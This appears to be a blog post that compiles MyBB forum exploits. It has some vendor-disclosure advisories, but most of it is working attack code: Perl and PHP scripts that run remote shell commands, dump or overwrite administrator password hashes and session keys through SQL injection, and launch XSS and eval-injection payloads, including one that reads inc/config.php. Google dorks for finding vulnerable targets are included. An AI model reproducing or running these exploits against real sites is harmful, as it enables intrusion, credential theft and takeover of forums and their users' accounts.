All Vuln on MyBB !

July 9, 2011

# MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML Injection

MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML
Injection

http://www.mybb.com

12-12-2010


Poc: http://infectionsupport.com/tags.php?tag=
"><script>alert(String.fromCharCode(88,83,83))</script>

     http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s
></script>

Google dork: powered by mybb inurl:tags.php?tag=


by Teamelite  (Methodman) http://nemesis.te-home.net

# MyBB 1.6 <= Cross Site Scripting (XSS) Vulnerability

============================================
 MyBB 1.6 <= Cross Site Scripting (XSS) Vulnerability
============================================


1. OVERVIEW

MyBB was vulnerable to Cross Site Scripting Vulnerability.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

Two XSS vulnerabilities were found. One is user-driven XSS on "url" parameter.
User will get xssed upon successful log-in.
The other is a reflected XSS on "posthash" parameter where the valid
tid (topic id) is required for successful attack.
The anti-CSRF check against "my_post_key" parameter was not done in
thread/post preview mode and thus there came a way for XSS to be
successful.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

User-driven XSS
http://attacker.in/mybb/member.php?action=login&url=javascript:alert%28/XSS/%29

Reflected XSS
http://attacker.in/mybb/newreply.php?my_post_key=&subject=XSS&action=do_newreply&posthash="><script>alert(/XSS/)</script>&quoted_ids=&lastpid=1&from_page=1&tid=1&method=quickreply&message=test&previewpost=Preview
Post


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_cross_site_scripting
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-20]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

# MyBB 1.6 <= SQL Injection Vulnerability

=================================
 MyBB 1.6 <= SQL Injection Vulnerability
=================================



1. OVERVIEW

Potential SQL Injection vulnerability was detected in MyBB.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

The "keywords" parameter was not properly sanitized in /private.php
and /search.php which leads to SQL Injection vulnerability.
Full exploitation  possibility is probably mitigated by clean_keywords
and clean_keywords_ft functions in inc/functions_search.php.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

=> /search.php

POST /mybb/search.php

action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1


=> /private.php

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-24: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-24]


---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

# mybb v1.4.8 search.php blind/query based sql injection vulns

##########################
# mybb v1.4.8 search.php blind/query based sql injection vulns
# author: $qL_DoCt0r
# msn: sidthesloth@windowslive.com
# blog: http://full-discl0sure.blogspot.com
# moderator of: http://hackwarez.net
##########################
search.php fails to correctly sanitise the user input validation allowing
error based and query based sql injection to discreetly extract
undisclosed information from the sql database

simple query: ' or 1=1--
blind query: ' having 1=1--
must be registered on forum with 2+ posts for this to work 

solution: simple add a simple sanitiser for $sqlstring and the search
input variable
!
#GREETINGS: TheMindRapist ~ Qabandi ~ Mr.SQL ~ WEbDEvil


-- 
--------------------------------------------------------------
         This email was sent using Telecom SchoolZone.
                    www.schoolzone.net.nz

This email has been scanned for viruses by Telecom SchoolZone,
but is not guaranteed to be virus-free.
--------------------------------------------------------------

# MyBB version 1.1.2

#!/usr/bin/perl
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you *****!
#
# - First you need to create the special user to do this use:
# ./mybibi.pl --host=http://www.example.com --dir=/mybb -1
# this step needs a graphic confirmation so the exploit writes a file
# in /tmp/file.png, you need to
# see this img and put the text into the prompt. If everything is ok,
# you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output
# for debugging.
# - After you have created the exploit or if you have a valid non common
# user, you can execute shell commands.
#
# TIPS:
# * Sometimes you have to change the thread Id, --tid is your friend 
# * Don't forget to change the email. You MUST activate the account.
# * Mejor karate aun dentro ti.
#
# LIMITATIONS:
# * If the admin have the username lenght < 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # you can choose this or another one.

my ($*****,$*****_user,$*****_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s' => \$host,
  'dir=s' => \$dir,
  '*****=s' => \$*****,
  '*****_user=s' => \$*****_user,
  '*****_pass=s' => \$*****_pass,
  'debug' => \$debug,
  '1' => \$first_time,
  'tid=s' => \$tid,
  'delete' => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) **
 $host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=> ** file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->*****(['http'] => $*****) if $*****;
$req->*****_authorization_basic($*****_user, $*****_pass) if $*****_user;

create_user() if $first_time;

while () **
  login() if !$logged;

  print "mybibi> "; # lost connection
  while(<STDIN>) **
    $command=$_;
    chomp($command);
    last;
  }
  &send($command);
}

sub send **
 chomp (my $cmd = shift);
 my $h = $host.$dir."/newthread.php";
 my $req = POST $h, [
  'subject' => '514',
  'message' => '/slap 514',
  'previewpost' => 'Preview Post',
  'action' => 'do_newthread',
  'fid' => $tid,
  'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
 ];
 $req->header($uservar => $cmd);
 print $req->as_string() if $debug;
 my $res = $ua->request($req);
 if ($res->content =~ /You may not post in this/) **
  print "[!] don't have perms to post. Change the Forum ID\n";
 } else **
  my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
  print $data;
 }

}
sub login **
 my $h = $host.$dir."/member.php";
 my $req = POST $h,[
  'username' => $username,
  'password' => $password,
  'submit' => 'Login',
  'action' => 'do_login'
 ];
 my $res = $ua->request($req);
 if ($res->content =~ /You have successfully been logged/is) **
  print "[*] Login succesful!\n";
  $logged = 1;
 } else **
  print "[!] Error login-in\n";
 }
}

sub help **
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--***** (http), --*****_user, --*****_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user **
 # firs we need to get the img.
 my $h = $host.$dir."/member.php";
 print "Host: $h\n";

 $req = HTTP::Request->new (GET => $h."?action=register");
 $res = $ua->request ($req);

 my $req = POST $h, [
  'action' => "register",
  'agree' => "I Agree"
 ];
 print $req->as_string() if $debug;
 $res = $ua->request($req);

 my $content = $res->content();
 $content =~ m/.*(image\.php\?action.*?)\".*/is;
 my $img = $1;
 my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
 $res = $ua->request ($req);
 print $req->as_string();

 if ($res->content) **
  open (TMP, ">/tmp/file.png") or die($!);
  print TMP $res->content;
  close (TMP);
  print "[*] /tmp/file.png created.\n";
 }

 my ($hash) = $img =~ m/hash=(.*?)$/;
 my $img_str = get_img_str();
 unlink ("/tmp/file.png");
 $img_str =~ s/\n//g;
 my $req = POST $h, [
  'username' => $username,
  'password' => $password,
  'password2' => $password,
  'email' => $email,
  'email2' => $email,
  'imagestring' => $img_str,
  'imagehash' => $hash,
  'allownotices' => 'yes',
  'receivepms' => 'yes',
  'pmpopup' => 'no',
  'action' => "do_register",
  'regsubmit' => "Submit Registration"
 ];
 $res = $ua->request($req);
 print $req->as_string() if $debug;

 open (OUT, ">mybibi_out.html");
 print OUT $res->content;

 print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str ()
**
 print "\nNow I need the text shown in /tmp/file.png: ";
 my $str = <STDIN>;
 return $str;
}
exit 0;

# MyBulletinBoard version 1.00RC4 and prior

#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) **
   print "Usage:\nperl $0 [full_target_path] [user_id]\n\n Example:\nperl $0 http://www.example.com/mybb/ 1\n";
   exit(0);
}

$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,". "null,null,null,password,null%20FROM%20". "mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# MyBB finduser Search SQL Injection

#!/usr/bin/perl
###########################################
# Crouz.Com Security Team #
###########################################
# EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Xpl Change Admin's Pass For L0gin With P0wer User #
# #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln #
# #
###########################################
# GR33tz T0 ==> mh_p0rtal -- Dr-CephaleX -- The-Cephexin -- Djay_Agoustinno #
# No_Face_King -- Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
# #
# Special Lamerz : Hoormazd & imm02tal  ++ xshabgardx #
###########################################
use IO::Socket;

if (@ARGV < 2)
**
  print "\n==========================================\n";
  print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
  print " Crouz Security Team \n\n";
  print " Usage: <T4rg3t> <DIR>\n\n";
  print "==========================================\n\n";
  print "Examples:\n\n";
  print " Mybb.pl www.Site.com /mybb/ \n";
  exit();
}

my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) ** die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";


print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);

print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy \n\n";

Exploits #2:
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2])**
print "#########[ MyBB SQL-Injection ]##############\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "######################### #########\n";
exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0)**
print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui d,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
exit;
}else{

print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";

$page =~ m/<a href="member\.php\?action=profile&\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);

$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}

# MyBB version 1.04 and prior

#!/usr/bin/perl -w

# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
# http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat > 
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;

##-- Start --#

$host = "127.0.0.1";
$path = "/mybb3/";
$userid = 1;
$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";

##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# MyBB Dir On Server | exm. /mybb/
#
# $userid :-
# The ID Of The User U Wanna To Get His Loginkey
#
# $cookie :-
# You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
#
# $cookie = "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
                                                                                PeerAddr => "$host",
                                                                                PeerPort => "80",
                                                                                Proto => "tcp"
                                                                                ) or die("[!] Connect To Server Was Filed");
##-- DONT TRY TO EDIT ME --##
$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";

print $sock $evildata;

while($ans = <$sock>)**
        $ans =~ m/<a href=\"member.php\?action=profile&uid=1\" target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
}

#EoF

# MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit

<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
//      POST http://mybb.ru/forum/private.php HTTP/1.1
//      Host: mybb.ru
//      Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
//      Content-Type: application/x-www-form-urlencoded
//      Content-Length: 479
//      Connection: Close
//
//      to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin_sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin_loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
// 
// greets all https://forum.antichat.ru    b00zy/br 32sm. <====3 oO  ( .)(. )  root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08

error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);

header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");

?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>mybb 1.2.11 xek</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
**
    margin="5";
    FONT-WEIGHT: normal;
    COLOR: #B9B9BD;
    BACKGROUND: #44474F;
    FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
}

-->
</style>
</head>
<body>

<?php

function myflush($timee)
**
    if(ob_get_contents())
    **
        ob_flush();
        ob_clean();
        flush();
        usleep($timee);
    }
}

if (!$_GET)
**
    echo
    '<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
    <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value="?get admin passwd...?"><br><br>
    <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
    <font color="#B9B9BD">?¬ for expamle "expdb.cc"<br>
    <input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
    <font color="#B9B9BD">?¬ patch 2 mybb forum, for expamle "community/mybb"<br>
    <input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
    <font color="#B9B9BD">?¬ you username on this forum, for expamle "c411k"<br>
    <input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
    <font color="#B9B9BD">?¬ you password, for expamle "h1world"<br>
    <input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
    <font color="#B9B9BD">?¬ admin id, default 1<br>
    </form>';
}


if (isset($_GET['fuck_mybb']))
**
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';

function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
**
    global $send_http;
    $s = array();
    $url = fsockopen($host, 80);
    $send_http  = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
    $send_http .= "Host: $host\r\n";
    $send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
    $send_http .= "Cookie: $cook1e\r\n";
    $send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
    $send_http .= "Connection: Close\r\n\r\n";
    if ($method === 'POST')
    **
        $send_http .= $data_gp;
    }
    //print_r($send_http);
    fputs($url, $send_http);
    while (!feof($url)) $s[] = fgets($url, 1028);
    fclose($url);
    return $s;
}

echo '<pre>- start....';
myflush(50000);

$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000);

foreach ($get_cookie as $value)
**
    if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
    **
        $value = explode(";", $value);
        $cookie = strstr($value[0], 'mybbuser');
        break;
    }
}
echo '<pre>- cookie: '.$cookie;
myflush(50000);

preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '<pre>- user id: '.$get_uid;
myflush(50000);

$data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '<pre>- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash <a href=http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
}


?>

</body>
</html>

# MyBB Plugin Custom Pages 1.0 Remote SQL Injection Vulnerability

###################################################################################
#                                         #
# MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
#                                         #
#    found by: Lidloses_Auge                              #
#    Greetz to: free-hack.com                             #
#                                         #
###############################################################################################################################################
#                                                                         #
# Vulnerability:                                                                  #
#                                                                         #
#    Document:      pages.php                                                             #
#    GET-Parameter: page                                                              #
#                                                                         #
# Dork:                                                                       #
#                                                                         #
#    inurl:"pages.php" + intext:"powered by mybb"                                                 #
#                                                                         #
# Example:                                                                    #
#                                                                         #
#    http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
#                                                                         #
# Notes:                                                                      #
#                                                                         #
#    Successrate depends on the permissions which could be set for viewing the 'page'                                     #
#                                                                         #
###############################################################################################################################################

# MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit

#!/usr/bin/perl

#
# MyBB <=1.2.11 SQL Injection Exploit based on http://www.waraxe.us/advisory-64.html
#
# Needs MySQL >=4.1 and a valid registration.
#
# By F
#

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use HTML::Entities;

####

    print("\n");
    print("############################################################################\n");
    print("#                 MyBB <=1.2.11 SQL Injection Exploit by F                 #\n");
    print("############################################################################\n");

if(@ARGV<5)**
    print("# Usage: perl mybb1211.pl host path user pass victim_uid [last_victim_uid] #\n");
    print("############################################################################\n");
    exit;
};

$host="http://".$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$pass=$ARGV[3];
$vid1=$ARGV[4];

if(@ARGV<=5)**
    $vidn=$vid1;
}else{
    $vidn=$ARGV[5];
};

print("\n");
print(" [~] Host: ".$host."\n");
print(" [~] Path: ".$path."\n");
print(" [~] User: ".$user."\n");
print(" [~] Pass: ".$pass."\n");
print(" [~] From  #".$vid1."\n");
print(" [~] To    #".$vidn."\n");
print("\n");

####

# create $browser and $cookie_jar
$browser=LWP::UserAgent->new() or die(" [-] Cannot create new UserAgent\n");
$cookie_jar=HTTP::Cookies->new();
$browser->cookie_jar($cookie_jar);

# try to log in
$result=$browser->post(
    $host.$path."member.php",
    Content=>[
        "action"=>"do_login",
        "username"=>$user,
        "password"=>$pass,
        "url"=>$host.$path."index.php",
        "submit"=>"Login",
    ],
);

# check cookie
if($cookie_jar->as_string=~m/mybbuser=.*?;/)**
    print(" [+] Login successful\n");
}else{
    print(" [-] Login unsuccessful\n");
    exit;
};

# try to get uid
$result=$browser->get($host.$path."usercp.php");

# check result
if($result->as_string=~m/member\.php\?action=profile&uid=([0-9]*?)"/)**
    $uid=$1;
    print(" [+] Getting uid successful: ".$uid."\n");
}else{
    print(" [-] Getting uid unsuccessful\n");
    exit;
};

# construct exploit
$exploit ="yes','0','0'),";
$exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_result','0',concat('(haxx_start)',";
for($vid=$vid1;$vid<=$vidn;$vid++)**
    $exploit.="ifnull((select concat(uid,'-',username,':',password,':',salt,'::',email,'-',usergroup,'-',additionalgroups,'-',website,'-',regip,'(haxx_delim)') from mybb_users where uid=".$vid."),''),";
};
$exploit.="'(haxx_end)'),'".time()."','0','no','yes";

# try to send exploit
$result=$browser->post(
    $host.$path."private.php",
    Content=>[
        "action"=>"do_send",
        "subject"=>"haxx_message=".(1+rand(65536)),
        "message"=>"nuthin".(1+rand(65536)),
        "to"=>$user,
        "options[disablesmilies]"=>$exploit,
    ],
);

# check if user is valid
if( ($result->as_string=~m/Your account has either been suspended or you have been banned from accessing this resource\./) ||
    ($result->as_string=~m/You do not have permission to access this page\./) ||
    ($result->as_string=~m/Your account may still be awaiting activation or moderation\./)
)**
    print(" [-] User has no permission to send private messages. This can happen if the user is suspended, banned, unactivated, or for other similar reasons.\n");
    exit;
};

# check the 5 minute cap
if($result->as_string=~m/You have already submitted the same private message to the same recipient within the last 5 minutes\./)**
    print(" [-] Unsuccessful attempt to fool MyBB with the 5 minute limit on sending private messages. Please run the exploit again.\n");
    exit;
};

# delete auxiliary message
$result=$browser->get($host.$path."private.php?fid=1");
if($result->as_string=~m/private\.php\?action=read&pmid=([0-9]*?)">haxx_message=[0-9]*?</)**
    print(" [+] The auxiliary message was found and successfully deleted\n");
    $pmid=$1;
    $browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
}else{
    print(" [-] Warning! The auxiliary message wasn't found and could not be deleted!\n");
};

# download and delete result message
if($result->as_string=~m/private\.php\?action=read&pmid=([0-9]*?)">haxx_result</)**
    print(" [+] The result message was found. Getting hashes.\n\n");
    $pmid=$1;
    $result=$browser->get($host.$path."private.php?action=read&pmid=".$pmid);
    if($result->as_string=~m/\(haxx_start\)(.*)\(haxx_end\)/s)**
        $pm=$1;
        $pm=~s/\(haxx_delim\)/\n/g;
        $pm=~s/<br \/>//g;
        $pm=decode_entities($pm);
        print($pm);
    };
    $browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
}else{
    print(" [-] The result message wasn't found. Exploit failed!\n");
    exit;
};

# MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities

[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10
===============================================================================

Author: Janek Vind "waraxe"
Independent discovery: koziolek
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-61.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MyBB is a discussion board that has been around for a while; it has evolved
from other bulletin boards into the forum package it is today. Therefore,
it is a professional and efficient discussion board, developed by an active
team of developers.

Vulnerabilities discovered
===============================================================================

1. Remote Code Execution in "forumdisplay.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: valid forum "fid" must be known.
Attacker doesn't need to have any privileges in mybb installation to be
successful in attack.

Proof-Of-Concept request:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='

... and we will see error message:

Parse error: syntax error, unexpected ''', expecting ']' in
C:\apache_wwwroot\mybb.1.2.10\forumdisplay.php(407) : eval()'d code on line 1

Problematic piece of code is related to "eval()" function:

eval("\$orderarrow['$sortby'] = \"".
$templates->get("forumdisplay_orderarrow")."\";");


Example attacks:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];readfile('inc/config.php');exit;//


2. Remote Code Execution in "search.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: search "sid" must be known - but that's trivial task.
Attacker doesn't need to have any privileges in mybb installation to be
successful in attack.

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='

